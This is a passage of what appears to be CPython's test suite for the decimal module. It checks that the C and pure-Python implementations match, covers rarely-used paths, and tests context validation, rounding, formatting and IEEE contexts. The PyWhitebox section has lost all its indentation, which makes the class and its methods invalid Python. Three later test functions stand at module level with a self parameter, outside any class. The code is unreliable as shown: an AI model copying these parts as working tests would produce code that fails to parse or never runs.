class CContextSubclassing(ContextSubclassing):
    # Run the ContextSubclassing suite against the C implementation.
    decimal = C
class PyContextSubclassing(ContextSubclassing):
    # Run the ContextSubclassing suite against the pure-Python implementation.
    decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
    """Check that the C and Python implementations expose the same API."""

    def test_module_attributes(self):
        # Architecture dependent context limits
        self.assertEqual(C.MAX_PREC, P.MAX_PREC)
        self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
        self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
        self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)

        self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
        self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)

        self.assertEqual(C.__version__, P.__version__)

        self.assertEqual(dir(C), dir(P))

    def test_context_attributes(self):
        # every public C Context attribute must also exist on the Python one
        x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())

    def test_decimal_attributes(self):
        x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
        # BUG FIX: the second listing must come from the Python implementation;
        # comparing dir(C.Decimal(9)) with itself made this test vacuous.
        y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
    """Tests that exist mainly to exercise rarely-hit code paths."""

    def test_adjusted(self):
        Decimal = self.decimal.Decimal

        self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
        # XXX raise?
        self.assertEqual(Decimal('nan').adjusted(), 0)
        self.assertEqual(Decimal('inf').adjusted(), 0)

    def test_canonical(self):
        Decimal = self.decimal.Decimal
        getcontext = self.decimal.getcontext

        x = Decimal(9).canonical()
        self.assertEqual(x, 9)

        c = getcontext()
        x = c.canonical(Decimal(9))
        self.assertEqual(x, 9)

    def test_context_repr(self):
        # repr() of a fully-customized context must round-trip every field.
        c = self.decimal.DefaultContext.copy()

        c.prec = 425000000
        c.Emax = 425000000
        c.Emin = -425000000
        c.rounding = ROUND_HALF_DOWN
        c.capitals = 0
        c.clamp = 1
        for sig in OrderedSignals[self.decimal]:
            c.flags[sig] = False
            c.traps[sig] = False

        s = c.__repr__()
        t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
            "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
            "flags=[], traps=[])"
        self.assertEqual(s, t)

    def test_implicit_context(self):
        # Operators and methods without an explicit context argument must
        # pick up the thread-local context (prec=1 forces visible rounding).
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            c.prec = 1
            c.Emax = 1
            c.Emin = -1

            # abs
            self.assertEqual(abs(Decimal("-10")), 10)
            # add
            self.assertEqual(Decimal("7") + 1, 8)
            # divide
            self.assertEqual(Decimal("10") / 5, 2)
            # divide_int
            self.assertEqual(Decimal("10") // 7, 1)
            # fma
            self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
            self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
            # three arg power
            self.assertEqual(pow(Decimal(10), 2, 7), 2)
            # exp
            self.assertEqual(Decimal("1.01").exp(), 3)
            # is_normal
            self.assertIs(Decimal("0.01").is_normal(), False)
            # is_subnormal
            self.assertIs(Decimal("0.01").is_subnormal(), True)
            # ln
            self.assertEqual(Decimal("20").ln(), 3)
            # log10
            self.assertEqual(Decimal("20").log10(), 1)
            # logb
            self.assertEqual(Decimal("580").logb(), 2)
            # logical_invert
            self.assertEqual(Decimal("10").logical_invert(), 1)
            # minus
            self.assertEqual(-Decimal("-10"), 10)
            # multiply
            self.assertEqual(Decimal("2") * 4, 8)
            # next_minus
            self.assertEqual(Decimal("10").next_minus(), 9)
            # next_plus
            self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
            # normalize
            self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
            # number_class
            self.assertEqual(Decimal("10").number_class(), '+Normal')
            # plus
            self.assertEqual(+Decimal("-1"), -1)
            # remainder
            self.assertEqual(Decimal("10") % 7, 3)
            # subtract
            self.assertEqual(Decimal("10") - 7, 3)
            # to_integral_exact
            self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)

            # Boolean functions
            self.assertTrue(Decimal("1").is_canonical())
            self.assertTrue(Decimal("1").is_finite())
            self.assertTrue(Decimal("1").is_finite())
            self.assertTrue(Decimal("snan").is_snan())
            self.assertTrue(Decimal("-1").is_signed())
            self.assertTrue(Decimal("0").is_zero())
            self.assertTrue(Decimal("0").is_zero())

            # Copy
            with localcontext() as c:
                c.prec = 10000
                x = 1228 ** 1523
                y = -Decimal(x)

                z = y.copy_abs()
                self.assertEqual(z, x)

                z = y.copy_negate()
                self.assertEqual(z, x)

                z = y.copy_sign(Decimal(1))
                self.assertEqual(z, x)

    def test_divmod(self):
        # divmod() with NaN/infinity operands and zero divisors.
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero

        with localcontext() as c:
            q, r = divmod(Decimal("10912837129"), 1001)
            self.assertEqual(q, Decimal('10901935'))
            self.assertEqual(r, Decimal('194'))

            # a quiet NaN operand propagates without signaling
            q, r = divmod(Decimal("NaN"), 7)
            self.assertTrue(q.is_nan() and r.is_nan())

            c.traps[InvalidOperation] = False
            q, r = divmod(Decimal("NaN"), 7)
            self.assertTrue(q.is_nan() and r.is_nan())

            c.traps[InvalidOperation] = False
            c.clear_flags()
            q, r = divmod(Decimal("inf"), Decimal("inf"))
            self.assertTrue(q.is_nan() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            q, r = divmod(Decimal("inf"), 101)
            self.assertTrue(q.is_infinite() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            q, r = divmod(Decimal(0), 0)
            self.assertTrue(q.is_nan() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation])

            c.traps[DivisionByZero] = False
            c.clear_flags()
            q, r = divmod(Decimal(11), 0)
            self.assertTrue(q.is_infinite() and r.is_nan())
            self.assertTrue(c.flags[InvalidOperation] and
                            c.flags[DivisionByZero])

    def test_power(self):
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        Overflow = self.decimal.Overflow
        Rounded = self.decimal.Rounded

        with localcontext() as c:
            c.prec = 3
            c.clear_flags()
            self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
            self.assertTrue(c.flags[Rounded])

            c.prec = 1
            c.Emax = 1
            c.Emin = -1
            c.clear_flags()
            c.traps[Overflow] = False
            self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
            self.assertTrue(c.flags[Overflow])

    def test_quantize(self):
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext
        InvalidOperation = self.decimal.InvalidOperation

        with localcontext() as c:
            c.prec = 1
            c.Emax = 1
            c.Emin = -1
            c.traps[InvalidOperation] = False
            # quantizing outside the exponent range yields NaN when untrapped
            x = Decimal(99).quantize(Decimal("1e1"))
            self.assertTrue(x.is_nan())

    def test_radix(self):
        Decimal = self.decimal.Decimal
        getcontext = self.decimal.getcontext

        c = getcontext()
        self.assertEqual(Decimal("1").radix(), 10)
        self.assertEqual(c.radix(), 10)

    def test_rop(self):
        # reflected operators return NotImplemented for foreign operands
        Decimal = self.decimal.Decimal

        for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
                     '__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
            self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)

    def test_round(self):
        # Python3 behavior: round() returns Decimal
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            c.prec = 28

            self.assertEqual(str(Decimal("9.99").__round__()), "10")
            self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
            self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
            self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
            self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")

            self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
            self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)

    def test_create_decimal(self):
        c = self.decimal.Context()
        self.assertRaises(ValueError, c.create_decimal, ["%"])

    def test_int(self):
        Decimal = self.decimal.Decimal
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            c.prec = 9999
            x = Decimal(1221**1271) / 10**3923
            self.assertEqual(int(x), 1)
            self.assertEqual(x.to_integral(), 2)

    def test_copy(self):
        Context = self.decimal.Context

        c = Context()
        c.prec = 10000
        x = -(1172 ** 1712)

        y = c.copy_abs(x)
        self.assertEqual(y, -x)

        y = c.copy_negate(x)
        self.assertEqual(y, -x)

        y = c.copy_sign(x, 1)
        self.assertEqual(y, -x)
class CCoverage(Coverage):
    # Run the Coverage suite against the C implementation.
    decimal = C
class PyCoverage(Coverage):
    # Run the Coverage suite against the pure-Python implementation.
    decimal = P
class PyFunctionality(unittest.TestCase):
    """Extra functionality in decimal.py"""

    def test_py_alternate_formatting(self):
        """Alternate ('#') formatting forces a trailing decimal point."""
        Decimal = P.Decimal
        localcontext = P.localcontext

        # (format spec, input string, expected output) triples
        cases = (
            # Issue 7094: Alternate formatting (specified by #)
            ('.0e', '1.0', '1e+0'),
            ('#.0e', '1.0', '1.e+0'),
            ('.0f', '1.0', '1'),
            ('#.0f', '1.0', '1.'),
            ('g', '1.1', '1.1'),
            ('#g', '1.1', '1.1'),
            ('.0g', '1', '1'),
            ('#.0g', '1', '1.'),
            ('.0%', '1.0', '100%'),
            ('#.0%', '1.0', '100.%'),
        )
        for spec, value, expected in cases:
            self.assertEqual(format(Decimal(value), spec), expected)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
    """Copy-constructing a Decimal from a Decimal yields an equal but
    distinct object (no interning / identity sharing)."""
    Decimal = P.Decimal
    original = Decimal(45)
    duplicate = Decimal(original)
    self.assertEqual(str(duplicate), '45')
    self.assertNotEqual(id(original), id(duplicate))
def test_py_rescale(self):
    """Coverage: _rescale() on a NaN is a no-op that returns a NaN."""
    Decimal = P.Decimal
    with P.localcontext():
        rescaled = Decimal("NaN")._rescale(3, ROUND_UP)
        self.assertTrue(rescaled.is_nan())
def test_py__round(self):
    """Coverage: Decimal._round() rejects a non-positive digit count."""
    with self.assertRaises(ValueError):
        P.Decimal("3.1234")._round(0, ROUND_UP)
class CFunctionality(unittest.TestCase):
    """Extra functionality in _decimal"""

    @requires_extra_functionality
    def test_c_ieee_context(self):
        """IEEEContext() builds the three standard IEEE interchange contexts."""
        # issue 8786: Add support for IEEE 754 contexts to decimal module.
        IEEEContext = C.IEEEContext
        DECIMAL32 = C.DECIMAL32
        DECIMAL64 = C.DECIMAL64
        DECIMAL128 = C.DECIMAL128

        def assert_rest(self, context):
            # Invariants shared by all IEEE contexts: clamping enabled,
            # no traps and no flags set.
            self.assertEqual(context.clamp, 1)
            assert_signals(self, context, 'traps', [])
            assert_signals(self, context, 'flags', [])

        c = IEEEContext(DECIMAL32)
        self.assertEqual(c.prec, 7)
        self.assertEqual(c.Emax, 96)
        self.assertEqual(c.Emin, -95)
        assert_rest(self, c)

        c = IEEEContext(DECIMAL64)
        self.assertEqual(c.prec, 16)
        self.assertEqual(c.Emax, 384)
        self.assertEqual(c.Emin, -383)
        assert_rest(self, c)

        c = IEEEContext(DECIMAL128)
        self.assertEqual(c.prec, 34)
        self.assertEqual(c.Emax, 6144)
        self.assertEqual(c.Emin, -6143)
        assert_rest(self, c)

        # Invalid values
        self.assertRaises(OverflowError, IEEEContext, 2**63)
        self.assertRaises(ValueError, IEEEContext, -1)
        self.assertRaises(ValueError, IEEEContext, 1024)

    @requires_extra_functionality
    def test_c_context(self):
        """Context() accepts raw integer masks through flags= and traps=."""
        Context = C.Context

        c = Context(flags=C.DecClamped, traps=C.DecRounded)
        self.assertEqual(c._flags, C.DecClamped)
        self.assertEqual(c._traps, C.DecRounded)

    @requires_extra_functionality
    def test_constants(self):
        """The C module's integer signal constants have the documented values."""
        # Condition flags
        cond = (
            C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
            C.DecDivisionImpossible, C.DecDivisionUndefined,
            C.DecFpuError, C.DecInexact, C.DecInvalidContext,
            C.DecInvalidOperation, C.DecMallocError,
            C.DecFloatOperation, C.DecOverflow, C.DecRounded,
            C.DecSubnormal, C.DecUnderflow
        )

        # IEEEContext
        self.assertEqual(C.DECIMAL32, 32)
        self.assertEqual(C.DECIMAL64, 64)
        self.assertEqual(C.DECIMAL128, 128)
        self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)

        # Conditions: each condition constant is a distinct bit.
        for i, v in enumerate(cond):
            self.assertEqual(v, 1<<i)

        self.assertEqual(C.DecIEEEInvalidOperation,
                         C.DecConversionSyntax|
                         C.DecDivisionImpossible|
                         C.DecDivisionUndefined|
                         C.DecFpuError|
                         C.DecInvalidContext|
                         C.DecInvalidOperation|
                         C.DecMallocError)

        self.assertEqual(C.DecErrors,
                         C.DecIEEEInvalidOperation|
                         C.DecDivisionByZero)

        self.assertEqual(C.DecTraps,
                         C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
    """Whitebox testing for _decimal"""

    def test_bignum(self):
        """Exact integer power agrees between int and Decimal at huge prec."""
        # Not exactly whitebox, but too slow with pydecimal.
        Decimal = C.Decimal
        localcontext = C.localcontext

        b1 = 10**35
        b2 = 10**36
        with localcontext() as c:
            c.prec = 1000000
            for i in range(5):
                a = random.randrange(b1, b2)
                b = random.randrange(1000, 1200)
                x = a ** b
                y = Decimal(a) ** Decimal(b)
                self.assertEqual(x, y)

    def test_invalid_construction(self):
        """Decimal() rejects a second positional argument of the wrong type."""
        self.assertRaises(TypeError, C.Decimal, 9, "xyz")

    def test_c_input_restriction(self):
        """Exponents too large for exact conversion raise InvalidOperation."""
        # Too large for _decimal to be converted exactly
        Decimal = C.Decimal
        InvalidOperation = C.InvalidOperation
        Context = C.Context
        localcontext = C.localcontext

        with localcontext(Context()):
            self.assertRaises(InvalidOperation, Decimal,
                              "1e9999999999999999999")

    def test_c_context_repr(self):
        """repr() of a fully-populated context matches the expected template."""
        # This test is _decimal-only because flags are not printed
        # in the same order.
        DefaultContext = C.DefaultContext
        FloatOperation = C.FloatOperation

        c = DefaultContext.copy()

        c.prec = 425000000
        c.Emax = 425000000
        c.Emin = -425000000
        c.rounding = ROUND_HALF_DOWN
        c.capitals = 0
        c.clamp = 1
        for sig in OrderedSignals[C]:
            c.flags[sig] = True
            c.traps[sig] = True
        c.flags[FloatOperation] = True
        c.traps[FloatOperation] = True

        s = c.__repr__()
        t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
            "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
            "flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
            "FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
            "traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
            "FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
        self.assertEqual(s, t)

    def test_c_context_errors(self):
        """Input validation for Context attributes and SignalDicts."""
        Context = C.Context
        InvalidOperation = C.InvalidOperation
        Overflow = C.Overflow
        FloatOperation = C.FloatOperation
        localcontext = C.localcontext
        getcontext = C.getcontext
        setcontext = C.setcontext
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)

        c = Context()

        # SignalDict: input validation
        self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
        self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
        self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
        self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
        self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
        self.assertRaises(TypeError, setattr, c,'traps', ['y'])
        self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
        self.assertRaises(KeyError, setattr, c, 'traps', {0:1})

        # Test assignment from a signal dict with the correct length but
        # one invalid key.
        d = c.flags.copy()
        del d[FloatOperation]
        d["XYZ"] = 91283719
        self.assertRaises(KeyError, setattr, c, 'flags', d)
        self.assertRaises(KeyError, setattr, c, 'traps', d)

        # Input corner cases
        int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
        gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9

        # prec, Emax, Emin
        for attr in ['prec', 'Emax']:
            self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
        self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)

        # prec, Emax, Emin in context constructor
        self.assertRaises(ValueError, Context, prec=gt_max_emax)
        self.assertRaises(ValueError, Context, Emax=gt_max_emax)
        self.assertRaises(ValueError, Context, Emin=-gt_max_emax)

        # Overflow in conversion
        self.assertRaises(OverflowError, Context, prec=int_max+1)
        self.assertRaises(OverflowError, Context, Emax=int_max+1)
        self.assertRaises(OverflowError, Context, Emin=-int_max-2)
        self.assertRaises(OverflowError, Context, clamp=int_max+1)
        self.assertRaises(OverflowError, Context, capitals=int_max+1)

        # OverflowError, general ValueError
        for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
            self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
            self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
            if sys.platform != 'win32':
                self.assertRaises(ValueError, setattr, c, attr, int_max)
                self.assertRaises(ValueError, setattr, c, attr, -int_max-1)

        # OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
        if C.MAX_PREC == 425000000:
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
                              int_max+1)
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
                              int_max+1)
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
                              -int_max-2)

        # ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
        if C.MAX_PREC == 425000000:
            self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
                              1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
                              1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
                              -1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)

        # capitals, clamp
        for attr in ['capitals', 'clamp']:
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(ValueError, setattr, c, attr, 2)
            self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
            if HAVE_CONFIG_64:
                self.assertRaises(ValueError, setattr, c, attr, 2**32)
                self.assertRaises(ValueError, setattr, c, attr, 2**32+1)

        # Invalid local context
        self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
                          locals())
        self.assertRaises(TypeError, exec,
                          'with localcontext(context=getcontext()): pass',
                          locals())

        # setcontext
        saved_context = getcontext()
        self.assertRaises(TypeError, setcontext, "xyz")
        setcontext(saved_context)

    def test_rounding_strings_interned(self):
        """The rounding-mode strings are shared between the C and Py modules."""
        self.assertIs(C.ROUND_UP, P.ROUND_UP)
        self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
        self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
        self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
        self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
        self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
        self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
        self.assertIs(C.ROUND_05UP, P.ROUND_05UP)

    @requires_extra_functionality
    def test_c_context_errors_extra(self):
        """Validation of the extra-functionality attrs _allcr/_flags/_traps."""
        Context = C.Context
        InvalidOperation = C.InvalidOperation
        Overflow = C.Overflow
        localcontext = C.localcontext
        getcontext = C.getcontext
        setcontext = C.setcontext
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)

        c = Context()

        # Input corner cases
        int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1

        # OverflowError, general ValueError
        self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
        self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
        if sys.platform != 'win32':
            self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
            self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)

        # OverflowError, general TypeError
        for attr in ('_flags', '_traps'):
            self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
            self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
            if sys.platform != 'win32':
                self.assertRaises(TypeError, setattr, c, attr, int_max)
                self.assertRaises(TypeError, setattr, c, attr, -int_max-1)

        # _allcr
        self.assertRaises(ValueError, setattr, c, '_allcr', -1)
        self.assertRaises(ValueError, setattr, c, '_allcr', 2)
        self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
        if HAVE_CONFIG_64:
            self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
            self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)

        # _flags, _traps
        for attr in ['_flags', '_traps']:
            self.assertRaises(TypeError, setattr, c, attr, 999999)
            self.assertRaises(TypeError, setattr, c, attr, 'x')

    def test_c_valid_context(self):
        """Exercise every Context getter/setter with valid values."""
        # These tests are for code coverage in _decimal.
        DefaultContext = C.DefaultContext
        Clamped = C.Clamped
        Underflow = C.Underflow
        Inexact = C.Inexact
        Rounded = C.Rounded
        Subnormal = C.Subnormal

        c = DefaultContext.copy()

        # Exercise all getters and setters
        c.prec = 34
        c.rounding = ROUND_HALF_UP
        c.Emax = 3000
        c.Emin = -3000
        c.capitals = 1
        c.clamp = 0

        self.assertEqual(c.prec, 34)
        self.assertEqual(c.rounding, ROUND_HALF_UP)
        self.assertEqual(c.Emin, -3000)
        self.assertEqual(c.Emax, 3000)
        self.assertEqual(c.capitals, 1)
        self.assertEqual(c.clamp, 0)

        self.assertEqual(c.Etiny(), -3033)
        self.assertEqual(c.Etop(), 2967)

        # Exercise all unsafe setters
        if C.MAX_PREC == 425000000:
            c._unsafe_setprec(999999999)
            c._unsafe_setemax(999999999)
            c._unsafe_setemin(-999999999)
            self.assertEqual(c.prec, 999999999)
            self.assertEqual(c.Emax, 999999999)
            self.assertEqual(c.Emin, -999999999)

    @requires_extra_functionality
    def test_c_valid_context_extra(self):
        """_allcr (all-correctly-rounded) toggles between 1 and 0."""
        DefaultContext = C.DefaultContext

        c = DefaultContext.copy()
        self.assertEqual(c._allcr, 1)
        c._allcr = 0
        self.assertEqual(c._allcr, 0)

    def test_c_round(self):
        """__round__ rejects out-of-range digit counts."""
        # Restricted input.
        Decimal = C.Decimal
        InvalidOperation = C.InvalidOperation
        localcontext = C.localcontext
        MAX_EMAX = C.MAX_EMAX
        MIN_ETINY = C.MIN_ETINY
        int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1

        with localcontext() as c:
            c.traps[InvalidOperation] = True
            self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
                              -int_max-1)
            self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
                              int_max)
            self.assertRaises(InvalidOperation, Decimal("1").__round__,
                              int(MAX_EMAX+1))
            self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
                              -int(MIN_ETINY-1))
            self.assertRaises(OverflowError, Decimal("1.23").__round__,
                              -int_max-2)
            self.assertRaises(OverflowError, Decimal("1.23").__round__,
                              int_max+1)

    def test_c_format(self):
        """__format__ argument validation and width limits."""
        # Restricted input
        Decimal = C.Decimal
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)

        self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
        self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
        self.assertRaises(TypeError, Decimal(1).__format__, [])
        self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")

        maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
        self.assertRaises(ValueError, Decimal("1.23456789").__format__,
                          "=%d.1" % maxsize)

    def test_c_integral(self):
        """to_integral / to_integral_value / to_integral_exact behavior."""
        Decimal = C.Decimal
        Inexact = C.Inexact
        localcontext = C.localcontext

        x = Decimal(10)
        self.assertEqual(x.to_integral(), 10)
        self.assertRaises(TypeError, x.to_integral, '10')
        self.assertRaises(TypeError, x.to_integral, 10, 'x')
        self.assertRaises(TypeError, x.to_integral, 10)

        self.assertEqual(x.to_integral_value(), 10)
        self.assertRaises(TypeError, x.to_integral_value, '10')
        self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
        self.assertRaises(TypeError, x.to_integral_value, 10)

        self.assertEqual(x.to_integral_exact(), 10)
        self.assertRaises(TypeError, x.to_integral_exact, '10')
        self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
        self.assertRaises(TypeError, x.to_integral_exact, 10)

        with localcontext() as c:
            x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
            self.assertEqual(x, Decimal('100000000000000000000000000'))

            x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
            self.assertEqual(x, Decimal('100000000000000000000000000'))

            # to_integral_exact sets (and here traps) Inexact.
            c.traps[Inexact] = True
            self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)

    def test_c_funcs(self):
        """Argument validation for assorted Decimal and Context methods."""
        # Invalid arguments
        Decimal = C.Decimal
        InvalidOperation = C.InvalidOperation
        DivisionByZero = C.DivisionByZero
        getcontext = C.getcontext
        localcontext = C.localcontext

        self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')

        self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
        self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
        self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")

        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), []
        )
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
        )
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
        )
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
        )

        with localcontext() as c:
            c.clear_traps()

            # Invalid arguments
            self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
            self.assertRaises(TypeError, c.canonical, 200)
